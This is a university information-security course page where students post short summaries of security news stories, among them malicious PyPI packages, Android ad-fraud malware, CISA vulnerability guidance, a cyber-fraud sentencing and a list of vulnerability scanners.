• Log In
  • Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

Protection of Information Assets

Temple University

Protection of Information Assets

MIS 5206.001 ■ Fall 2022 ■ David Lanter
  • HomePage
  • Instructor
  • Syllabus
  • Schedule
    • First Half of the Semester
      • Unit #1: Understanding an Organization’s Risk Environment
      • Unit #2: Case Study 1 – Snowfall and stolen laptop
      • Unit #2: Data Classification Process and Models
      • Unit #3: Risk Evaluation
      • Unit #4 Case #2: Autopsy of a Data Breach: The Target Case
      • Unit #5: Creating a Security Aware Organization
      • Unit #6: Physical and Environmental Security
    • Second Half of the Semester
      • Unit #8 Case Study 3 – A Hospital Catches the “Millennium Bug”
      • Unit #9: Business Continuity and Disaster Recovery Planning
      • Unit #10: Network Security
      • Unit #11: Cryptography, Public Key Encryption and Digital Signatures
      • Unit #12: Identity Management and Access Control
      • Unit #13: Computer Application Security
  • Deliverables
    • Weekly Deliverables
      • “In the News” Articles
      • Answers to Reading Discussion Questions
      • Comments on Reading Discussion Question and Other Students’ Answers
    • Case Studies
    • Team Project

In The News

November 9, 2022 by David Lanter 11 Comments

Filed Under: Unit 13: Computer Application Security Tagged With:

Reader Interactions

Comments

  1. Nishant Shah says

    November 11, 2022 at 2:35 pm

    Malicious Package on PyPI Hides Behind Image Files, Spreads Via GitHub

    A new malicious package has been found on the Python Package Index (PyPI) repository that could hide code in images with a steganographic technique and infect users through open-source projects on Github.

    The code in question was responsible for manually installing additional requirements, then downloading a picture from the web and using the newly installed package to process the image and trigger the processing generated output using the exec command.

    Findings indicate that PyPI malicious packages and related obfuscation techniques are evolving rapidly. To protect against attacks like this, Check Point Research recommends companies use threat code scanners to double-check third-party packages and ensure that ratings on projects on GitHub are not synthetically generated.

    https://www.infosecurity-magazine.com/news/malicious-package-pypi-hides-image/

    Log in to Reply
  2. Frank Kofi Kpotivi says

    November 13, 2022 at 3:02 pm

    Top Cyber Attacks of 2020
    During the coronavirus pandemic, a big portion of the population switched to working, buying, studying, and watching content online. As a result, cybercriminals now have more access to potential victims than ever before.

    The term “Zoombomb” was coined when hackers would break into a private Zoom meeting or online class and shout profanities and racist epithets or flash pornographic images. In an effort to politicize the coronavirus pandemic, nation-state hacker groups launched assaults against organizations working to contain it, including as the World Health Organization and the Centers for Disease Control and Prevention.
    In response to the massive economic precarity caused by the epidemic, even commonplace cyberattacks like email phishing, social engineering, and refund fraud took on a darker character.

    https://thehackernews.com/2021/01/top-cyber-attacks-of-2020.html

    Log in to Reply
  3. Sunam Rijal says

    November 13, 2022 at 8:38 pm

    Secure Coding Practices for Developers
    https://blog.convisoappsec.com/en/secure-coding-practices-for-developers/
    This blog talks about the secure coding practices for developers and it also highlights the problem that may occur if launching product without reviewing or testing code for its performance and security.
    • Clean and check all entries
    • Don’t keep secrets in code
    • Check for vulnerabilities in dependencies and external packages
    • Apply secure authentication
    • Apply the principle of least privilege

    Log in to Reply
  4. Aayush Mittal says

    November 13, 2022 at 10:04 pm

    Clicker Malware Garners Estimated 20 Million Downloads

    “Clicker” malware designed to facilitate ad fraud has been found on 16 mobile apps in the Google Play store, according to McAfee. Detected as Android/Clicker, the malware was inserted into legitimate-looking utility apps such as flashlights, QR readers, cameras, unit converters and task managers.
    Once the application is opened, it downloads its remote configuration by executing an HTTP request. After the configuration is downloaded, it registers the FCM (Firebase Cloud Messaging) listener to receive push messages. The malware forces infected devices to visit and browse certain websites in the background, without the user’s knowledge.
    After being notified by the security vendor, Google has removed the offending apps, which are estimated to have garnered as many as 20 million downloads.

    https://www.infosecurity-magazine.com/news/clicker-malware-20-million/

    Log in to Reply
  5. Chinenye Marylyn Akinola says

    November 14, 2022 at 1:48 am

    Qatar World Cup Firms Urged to Upgrade Cyber-Threat Model

    Organizing bodies and key partners of the FIFA World Cup in Qatar this autumn have been warned to enhance their resilience against a potential barrage of cyber-threats.

    Threat intelligence firm Digital Shadows claimed that the world’s most-watched sporting event would invite scrutiny from a variety of threat actors.

    “Scams could present themselves in many forms. For instance, financially motivated threat actors often plant in malicious URLs spoofing these events to fraudulent sites, hoping to maximize their chances of scamming naive internet users for a quick profit,” it warned in a blog post.

    “At the same time, hacktivist groups may exploit the public attention given to such events to exponentially increase the reach of their message. State-sponsored advanced persistent threat (APT) groups may also decide to target global sporting events like the Qatar 2022 World Cup to achieve state goals to the hosting country or the broader event community.”

    Digital Shadows urged organizations to take a risk-based approach to cybersecurity ahead of the event, focusing on cyber-hygiene best practices such as regular patching, multi-factor authentication (MFA) and phishing awareness.

    “A risk-based approach enables your organization to adapt its cybersecurity program to specific needs and vulnerabilities by considering the potential impact of a certain phenomenon and its likelihood,” it concluded.

    https://www.infosecurity-magazine.com/news/qatar-world-cup-firms-upgrade/

    Log in to Reply
  6. Mengqi Xiong says

    November 16, 2022 at 7:19 pm

    CISA has published guidance for the Stakeholder-Specific Vulnerability Classification (SSVC), which is a vulnerability management approach that assesses vulnerabilities and prioritizes remediation based on the development status, security impact, and prevalence of affected products in a single system. Executive Assistant Director (EAD) Eric Goldstein claims that implementing methodologies such as SSVC is a key step in advancing the vulnerability management ecosystem: the CISA’s Known Exploited Vulnerabilities (KEV) catalog, Common Security Advisory Framework (CSAF) and vulnerabilities Vulnerability Exploitability Exchange (VEX) is used in conjunction with SSVC to further reduce the window for cyber threat actors to exploit U.S. network. There is an urgent need for a standardized method for vendors to disclose security vulnerabilities to end users in an accelerated and automated manner, particularly during intense commercial periods such as the holidays. CISA encourages organizations to use its version of SSVC for vulnerability management. SSVC provides a customized decision tree model that helps companies prioritize vulnerability responses.

    https://www.securitymagazine.com/articles/98611-cisa-releases-vulnerability-management-methodology

    Log in to Reply
  7. Pranavi Yadalam Sekhar says

    November 16, 2022 at 7:35 pm

    Two men jailed in US for $6m cyber fraud scam

    For their involvement in the Nigerian-run business, George Ugochukwu Egwumba, 47, of Cypress, and Princewell Arinze Duru, 33, of Sacramento, received sentences of more than 10 years apiece from different California courts.

    In June, both men were found guilty of wire fraud and money laundering. The scheme saw victims, including elderly ones, being defrauded of at least $6 million, and there are currently 80 suspects in custody. They are only two of them.

    The Department of Justice (DoJ), which announced the sentencing, stated that “members of the conspiracy, many of whom were situated in Nigeria, used middlemen to communicate with their fellow co-conspirators stationed in the United States.”

    The scheme involved “a wide range of frauds, including frauds involving business email compromise (BEC), romance scams, elder fraud, and fraud employing.

    Through US bank accounts, money-transfer services like Western Union or MoneyGram, or cryptocurrencies, “the US-based middlemen participated in receiving and laundering the proceeds of the frauds.”

    While engaging in fraud himself “using malware and other cybercrime tools,” Egwumba obtained bank account information from collaborators to give to further criminals. He obtained bank account information from his fellow thieves through chat messages, which he then utilized to accept stolen money.

    By opening fictitious company bank accounts, employing money-transfer services, and using cryptocurrency wallets, Duru assisted his fellow cybercriminals in receiving and laundering the proceeds of their crimes.

    One of the ringleaders, Chuks Eroha, 42, is still at large and is thought to have fled to Nigeria after the Federal Bureau of Investigation issued a warrant for his arrest in 2017. The US authorities have so far obtained 19 guilty pleas in connection with the cyber fraud operation.

    https://cybernews.com/news/two-men-jailed-for-cyber-fraud-scam/

    Log in to Reply
  8. Asha Kunchakarra says

    November 16, 2022 at 8:40 pm

    https://www.darkreading.com/application-security/misconfigurations-vulnerabilities-found-in-95-of-applications

    Almost all applications these says have at least one vulnerability or misconfiguration that affects security. While many of the misconfigurations and vulnerabilities are considered to be of medium severity or less, at least 25% are rated highly or critically severe .”This really just points out that, [while] organizations may be doing a good job performing static scans to lower the number of coding vulnerabilities, they are not taking configuration into account, as it may be more difficult.” The data argues for the benefits of using multiple tools to analyze software for vulnerabilities and misconfigurations. Synopsys released data from a variety of different tests with each having similar top offenders. Weak configurations of encryption technology — namely, Secure Sockets Layer (SSL) and Transport Layer Security (TLS) — topped the charts for static, dynamic, and mobile application security tests, for example. Static and dynamic testing as well as software composition analysis (SCA) all have advantages and should be used together to have the highest chance to detect potential misconfigurations and vulnerabilities, says Synopsys’s Kelly, “These types of issues can be found in the early stages of the software development lifecycle (SDLC), such as the development and DevOps phases, which reduces the number that make it into production,” he says.

    Log in to Reply
  9. Wei Zhang says

    November 16, 2022 at 10:13 pm

    I’d like to share some Vulnerability Scanners:
    – Acunetix
    Acunetix is a Web vulnerability scanner with advanced crawling technology that looks for vulnerabilities to search all types of web pages, even those that are password-protected.
    – BeSECURE
    BeSECURE can continuously scan for network and application vulnerabilities, with daily updates and specialized testing methods capturing 99.99% of detectable vulnerabilities
    – Nessus
    Nessus is a remote security scanning tool that scans a computer and alerts it if it finds any vulnerabilities
    – Burp Suite
    BurpSuite is a constantly evolving vulnerability scanning tool that provides integrations for easy ticket generation

    https://www.coresecurity.com/blog/top-14-vulnerability-scanners-cybersecurity-professionals

    Log in to Reply
  10. Shadrack Owusu says

    November 16, 2022 at 11:01 pm

    A live stream failing in Nevada is “one of the ways blue states steal elections.”

    About a week ago, a computer application security incident occurred in Washoe County in Nevada. It has been reported that Washoe county went dark overnight on November 9, 2022. Due to the sequence of events, there are claims on social media alleging the officials were involved in some sort of wrongdoing to alter the election results.
    The live stream computer application lost connection with the courtesy cameras at 11:24 p.m. on the evening of November 9. Surprisingly, all staff had left for the night about 60 minutes prior to the incident and did not arrive back at the office until 7 a.m., the next day. The connection was restored at 7:53 a.m. on the morning of November 10.
    One of the recommendations to mitigate the risk documented on the county’s website is to look for a solution that would prevent software disruptions in the future or avoid a courtesy live stream feed. They believe that it will maintain transparency and minimize unnecessary speculation about interference with elections.

    https://www.politifact.com/factchecks/2022/nov/16/instagram-posts/nevada-ballot-counting-livestream-went-dark-but-vo/
    https://washoelife.washoecounty.gov/washoe-county/registrar-of-voters-livestream-cameras/

    Log in to Reply
  11. Elizaveta Ibeme says

    November 16, 2022 at 11:57 pm

    APT hackers compromised several countries’ digital certificate authorities and other government agencies with the intent to steal legitimate digital certificates. It was done using penetration testing tools. a loader malware created a back door that allowed the threat actors to access the victim’s network.

    https://cybersecuritynews.com/billbug-apt-malware/

    Log in to Reply

Leave a Reply Cancel reply

You must be logged in to post a comment.

Primary Sidebar

Weekly Discussions

  • Unit 01: Understanding an Organization's Risk Environment (5)
  • Unit 02: Case Study 1 – Snowfall and a stolen laptop (5)
  • Unit 02: Data Classification Process and Models (6)
  • Unit 03: Risk Evaluation (6)
  • Unit 04: Case Study 2 – Autopsy of a Data Breach – The Target Case (4)
  • Unit 05: Creating a Security Aware Organization (6)
  • Unit 06: Physical and Environmental Security (6)
  • Unit 08: Case Study 3 – A Hospital Catches the "Millennium Bug" (2)
  • Unit 09: Business Continuity and Disaster Recovery (6)
  • Unit 10: Network Security (6)
  • Unit 11: Cryptography, Public Key Encryption and Digital Signature (6)
  • Unit 12: Identity Management and Access Control (6)
  • Unit 13: Computer Application Security (6)
  • Welcome (1)

Copyright © 2023 · Course News Pro on Genesis Framework · WordPress · Log in